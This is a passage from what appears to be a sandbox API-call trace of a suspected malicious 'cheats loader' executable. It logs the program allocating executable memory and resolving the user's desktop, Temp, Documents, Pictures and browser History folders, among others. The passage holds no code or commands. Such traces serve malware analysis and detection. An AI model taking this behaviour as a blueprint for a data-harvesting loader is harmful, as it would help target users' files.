psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ffd34*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0052.445] GetThreadLocale () returned 0x409 [0052.445] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.447] GetThreadLocale () returned 0x409 [0052.447] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.447] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13ff9fc*="Cheats_Loader_protected.exe") returned 0x33 [0052.447] SysReAllocStringLen (in: pbstr=0x13ffd34*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ffd34*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0052.447] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0052.447] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchLength=0x33 | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 0x33 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffd34*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0x13ffd34*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0xe2289c*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0xe2289c*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0xe228ac*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0xe228ac*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffd28*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffd28*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffd2c*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffd2c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] GetThreadLocale () returned 0x409 [0052.448] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\fd1hvy\\desktop\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.448] GetThreadLocale () returned 0x409 [0052.448] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\fd1hvy\\desktop\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.448] GetFullPathNameW (in: lpFileName="c:\\users\\fd1hvy\\desktop\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="c:\\users\\fd1hvy\\desktop\\", lpFilePart=0x13ff9fc*=0x0) returned 0x18 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffd2c*="c:\\users\\fd1hvy\\desktop\\", psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffd2c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffc2c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] CharLowerBuffW (in: lpsz="c:\\users\\fd1hvy\\desktop\\", cchLength=0x18 | out: lpsz="c:\\users\\fd1hvy\\desktop\\") returned 0x18 [0052.448] SysReAllocStringLen (in: pbstr=0x13ffd2c*="c:\\users\\fd1hvy\\desktop\\", psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0x13ffd2c*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.448] SysReAllocStringLen (in: pbstr=0xe228ac*="c:\\users\\fd1hvy\\desktop\\", psz="c:\\users\\fd1hvy\\desktop\\", len=0x18 | out: pbstr=0xe228ac*="c:\\users\\fd1hvy\\desktop\\") returned 1 [0052.449] VirtualAlloc (lpAddress=0xe34000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xe34000 [0052.451] GetSystemDirectoryW (in: lpBuffer=0xe320c0, uSize=0xfffe | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0052.451] SysReAllocStringLen (in: pbstr=0x13ffd20*=0x0, psz="C:\\WINDOWS\\system32", len=0x13 | out: pbstr=0x13ffd20*="C:\\WINDOWS\\system32") returned 1 [0052.451] SysReAllocStringLen (in: pbstr=0x13ffd24*=0x0, psz="C:\\WINDOWS\\system32\\", len=0x14 | out: pbstr=0x13ffd24*="C:\\WINDOWS\\system32\\") returned 1 [0052.451] GetThreadLocale () returned 0x409 [0052.451] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.451] GetThreadLocale () returned 0x409 [0052.451] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.451] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\WINDOWS\\system32\\", lpFilePart=0x13ff9fc*=0x0) returned 0x14 [0052.451] SysReAllocStringLen (in: pbstr=0x13ffd24*="C:\\WINDOWS\\system32\\", psz="C:\\WINDOWS\\system32\\", len=0x14 | out: pbstr=0x13ffd24*="C:\\WINDOWS\\system32\\") returned 1 [0052.451] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\WINDOWS\\system32\\", len=0x14 | out: pbstr=0x13ffc2c*="C:\\WINDOWS\\system32\\") returned 1 [0052.451] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0052.451] SysReAllocStringLen (in: pbstr=0x13ffd24*="C:\\WINDOWS\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x13ffd24*="c:\\windows\\system32\\") returned 1 [0052.451] SysReAllocStringLen (in: pbstr=0xe228a8*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0xe228a8*="c:\\windows\\system32\\") returned 1 [0052.451] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0xe320c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0052.452] SysReAllocStringLen (in: pbstr=0x13ffd14*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffd14*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.452] SysReAllocStringLen (in: pbstr=0x13ffd18*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffd18*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.452] GetThreadLocale () returned 0x409 [0052.452] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.452] GetThreadLocale () returned 0x409 [0052.452] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.452] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x13ff9fc*=0x0) returned 0x23 [0052.452] SysReAllocStringLen (in: pbstr=0x13ffd18*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", psz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffd18*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.452] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", len=0x23 | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 1 [0052.452] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", cchLength=0x23 | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\temp\\") returned 0x23 [0052.452] SysReAllocStringLen (in: pbstr=0x13ffd18*="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", psz="c:\\users\\fd1hvy\\appdata\\local\\temp\\", len=0x23 | out: pbstr=0x13ffd18*="c:\\users\\fd1hvy\\appdata\\local\\temp\\") returned 1 [0052.452] SysReAllocStringLen (in: pbstr=0xe228b0*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\temp\\", len=0x23 | out: pbstr=0xe228b0*="c:\\users\\fd1hvy\\appdata\\local\\temp\\") returned 1 [0052.452] GetWindowsDirectoryW (in: lpBuffer=0xe320c0, uSize=0xfffe | out: lpBuffer="C:\\WINDOWS") returned 0xa [0052.452] SysReAllocStringLen (in: pbstr=0x13ffd08*=0x0, psz="C:\\WINDOWS", len=0xa | out: pbstr=0x13ffd08*="C:\\WINDOWS") returned 1 [0052.453] SysReAllocStringLen (in: pbstr=0x13ffd0c*=0x0, psz="C:\\WINDOWS\\", len=0xb | out: pbstr=0x13ffd0c*="C:\\WINDOWS\\") returned 1 [0052.453] GetThreadLocale () returned 0x409 [0052.453] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.453] GetThreadLocale () returned 0x409 [0052.453] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.453] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\WINDOWS\\", lpFilePart=0x13ff9fc*=0x0) returned 0xb [0052.453] SysReAllocStringLen (in: pbstr=0x13ffd0c*="C:\\WINDOWS\\", psz="C:\\WINDOWS\\", len=0xb | out: pbstr=0x13ffd0c*="C:\\WINDOWS\\") returned 1 [0052.453] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\WINDOWS\\", len=0xb | out: pbstr=0x13ffc2c*="C:\\WINDOWS\\") returned 1 [0052.453] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0052.453] SysReAllocStringLen (in: pbstr=0x13ffd0c*="C:\\WINDOWS\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x13ffd0c*="c:\\windows\\") returned 1 [0052.453] SysReAllocStringLen (in: pbstr=0xe228a4*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0xe228a4*="c:\\windows\\") returned 1 [0052.453] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0052.459] SysReAllocStringLen (in: pbstr=0x13ffcfc*=0x0, psz="C:\\Users\\FD1HVy\\Documents", len=0x19 | out: pbstr=0x13ffcfc*="C:\\Users\\FD1HVy\\Documents") returned 1 [0052.459] SysReAllocStringLen (in: pbstr=0x13ffd00*=0x0, psz="C:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0x13ffd00*="C:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.459] GetThreadLocale () returned 0x409 [0052.459] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.460] GetThreadLocale () returned 0x409 [0052.460] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.460] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\", lpFilePart=0x13ff9fc*=0x0) returned 0x1a [0052.460] SysReAllocStringLen (in: pbstr=0x13ffd00*="C:\\Users\\FD1HVy\\Documents\\", psz="C:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0x13ffd00*="C:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.460] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\Documents\\", len=0x1a | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\Documents\\") returned 1 [0052.460] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\fd1hvy\\documents\\") returned 0x1a [0052.460] SysReAllocStringLen (in: pbstr=0x13ffd00*="C:\\Users\\FD1HVy\\Documents\\", psz="c:\\users\\fd1hvy\\documents\\", len=0x1a | out: pbstr=0x13ffd00*="c:\\users\\fd1hvy\\documents\\") returned 1 [0052.460] SysReAllocStringLen (in: pbstr=0xe228a0*=0x0, psz="c:\\users\\fd1hvy\\documents\\", len=0x1a | out: pbstr=0xe228a0*="c:\\users\\fd1hvy\\documents\\") returned 1 [0052.460] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0052.461] SysReAllocStringLen (in: pbstr=0x13ffcf0*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x13ffcf0*="C:\\Users\\Public\\Documents") returned 1 [0052.461] SysReAllocStringLen (in: pbstr=0x13ffcf4*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x13ffcf4*="C:\\Users\\Public\\Documents\\") returned 1 [0052.461] GetThreadLocale () returned 0x409 [0052.462] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.462] GetThreadLocale () returned 0x409 [0052.462] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.462] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x13ff9fc*=0x0) returned 0x1a [0052.462] SysReAllocStringLen (in: pbstr=0x13ffcf4*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x13ffcf4*="C:\\Users\\Public\\Documents\\") returned 1 [0052.462] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x13ffc2c*="C:\\Users\\Public\\Documents\\") returned 1 [0052.462] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0052.462] SysReAllocStringLen (in: pbstr=0x13ffcf4*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x13ffcf4*="c:\\users\\public\\documents\\") returned 1 [0052.462] SysReAllocStringLen (in: pbstr=0xe228b4*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0xe228b4*="c:\\users\\public\\documents\\") returned 1 [0052.462] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0052.463] SysReAllocStringLen (in: pbstr=0x13ffce4*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x13ffce4*="C:\\Program Files (x86)") returned 1 [0052.463] SysReAllocStringLen (in: pbstr=0x13ffce8*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffce8*="C:\\Program Files (x86)\\") returned 1 [0052.463] GetThreadLocale () returned 0x409 [0052.463] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.463] GetThreadLocale () returned 0x409 [0052.463] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.463] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x13ff9fc*=0x0) returned 0x17 [0052.464] SysReAllocStringLen (in: pbstr=0x13ffce8*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffce8*="C:\\Program Files (x86)\\") returned 1 [0052.464] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x13ffc2c*="C:\\Program Files (x86)\\") returned 1 [0052.464] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0052.464] SysReAllocStringLen (in: pbstr=0x13ffce8*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x13ffce8*="c:\\program files (x86)\\") returned 1 [0052.464] SysReAllocStringLen (in: pbstr=0xe228b8*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0xe228b8*="c:\\program files (x86)\\") returned 1 [0052.464] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\ProgramData") returned 0x0 [0052.465] SysReAllocStringLen (in: pbstr=0x13ffcd8*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x13ffcd8*="C:\\ProgramData") returned 1 [0052.465] SysReAllocStringLen (in: pbstr=0x13ffcdc*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x13ffcdc*="C:\\ProgramData\\") returned 1 [0052.465] GetThreadLocale () returned 0x409 [0052.465] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.465] GetThreadLocale () returned 0x409 [0052.465] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.465] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x13ff9fc*=0x0) returned 0xf [0052.465] SysReAllocStringLen (in: pbstr=0x13ffcdc*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x13ffcdc*="C:\\ProgramData\\") returned 1 [0052.465] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x13ffc2c*="C:\\ProgramData\\") returned 1 [0052.465] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0052.465] SysReAllocStringLen (in: pbstr=0x13ffcdc*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x13ffcdc*="c:\\programdata\\") returned 1 [0052.465] SysReAllocStringLen (in: pbstr=0xe228bc*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0xe228bc*="c:\\programdata\\") returned 1 [0052.465] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0052.466] SysReAllocStringLen (in: pbstr=0x13ffccc*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x13ffccc*="C:\\Program Files (x86)\\Common Files") returned 1 [0052.466] SysReAllocStringLen (in: pbstr=0x13ffcd0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x13ffcd0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0052.466] GetThreadLocale () returned 0x409 [0052.466] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.466] GetThreadLocale () returned 0x409 [0052.466] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.466] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x13ff9fc*=0x0) returned 0x24 [0052.466] SysReAllocStringLen (in: pbstr=0x13ffcd0*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x13ffcd0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0052.466] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x13ffc2c*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0052.467] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0052.467] SysReAllocStringLen (in: pbstr=0x13ffcd0*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x13ffcd0*="c:\\program files (x86)\\common files\\") returned 1 [0052.467] SysReAllocStringLen (in: pbstr=0xe228c0*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0xe228c0*="c:\\program files (x86)\\common files\\") returned 1 [0052.467] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 0x0 [0052.475] SysReAllocStringLen (in: pbstr=0x13ffcc0*=0x0, psz="C:\\Users\\FD1HVy\\Pictures", len=0x18 | out: pbstr=0x13ffcc0*="C:\\Users\\FD1HVy\\Pictures") returned 1 [0052.475] SysReAllocStringLen (in: pbstr=0x13ffcc4*=0x0, psz="C:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0x13ffcc4*="C:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.475] GetThreadLocale () returned 0x409 [0052.475] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.475] GetThreadLocale () returned 0x409 [0052.475] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\", lpFilePart=0x13ff9fc*=0x0) returned 0x19 [0052.476] SysReAllocStringLen (in: pbstr=0x13ffcc4*="C:\\Users\\FD1HVy\\Pictures\\", psz="C:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0x13ffcc4*="C:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.476] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\Pictures\\", len=0x19 | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\Pictures\\") returned 1 [0052.476] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Pictures\\", cchLength=0x19 | out: lpsz="c:\\users\\fd1hvy\\pictures\\") returned 0x19 [0052.476] SysReAllocStringLen (in: pbstr=0x13ffcc4*="C:\\Users\\FD1HVy\\Pictures\\", psz="c:\\users\\fd1hvy\\pictures\\", len=0x19 | out: pbstr=0x13ffcc4*="c:\\users\\fd1hvy\\pictures\\") returned 1 [0052.476] SysReAllocStringLen (in: pbstr=0xe228c4*=0x0, psz="c:\\users\\fd1hvy\\pictures\\", len=0x19 | out: pbstr=0xe228c4*="c:\\users\\fd1hvy\\pictures\\") returned 1 [0052.476] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0xe320c0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0052.477] SysReAllocStringLen (in: pbstr=0x13ffcb4*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", len=0x37 | out: pbstr=0x13ffcb4*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0052.477] SysReAllocStringLen (in: pbstr=0x13ffcb8*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0x13ffcb8*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.477] GetThreadLocale () returned 0x409 [0052.477] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0052.477] GetThreadLocale () returned 0x409 [0052.477] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0052.477] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x13ffa00, lpFilePart=0x13ff9fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x13ff9fc*=0x0) returned 0x38 [0052.477] SysReAllocStringLen (in: pbstr=0x13ffcb8*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0x13ffcb8*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.477] SysReAllocStringLen (in: pbstr=0x13ffc2c*=0x0, psz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0x13ffc2c*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.477] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x38 | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history\\") returned 0x38 [0052.477] SysReAllocStringLen (in: pbstr=0x13ffcb8*="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history\\", len=0x38 | out: pbstr=0x13ffcb8*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0052.477] SysReAllocStringLen (in: pbstr=0xe228c8*=0x0, 